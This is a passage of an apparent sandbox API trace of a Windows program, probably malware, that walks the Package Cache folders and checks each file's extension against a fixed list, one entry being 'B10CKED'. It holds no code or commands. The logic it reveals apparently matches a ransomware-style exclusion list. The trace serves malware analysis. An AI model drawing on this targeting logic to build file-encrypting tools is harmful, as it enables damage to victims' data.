CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="MSI", cchCount2=3) returned 2 [0110.438] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0110.438] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.438] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.438] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.439] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.439] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.439] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0110.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.441] CharUpperBuffW (in: lpsz="exe", cchLength=0x3 | out: lpsz="EXE") returned 0x3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="EXE", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="EXE", cchCount2=3) returned 1 [0110.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="EXE", cchCount2=3) returned 1 [0110.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="EXE", cchCount2=3) returned 2 [0110.442] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.442] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.442] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.443] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.443] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", 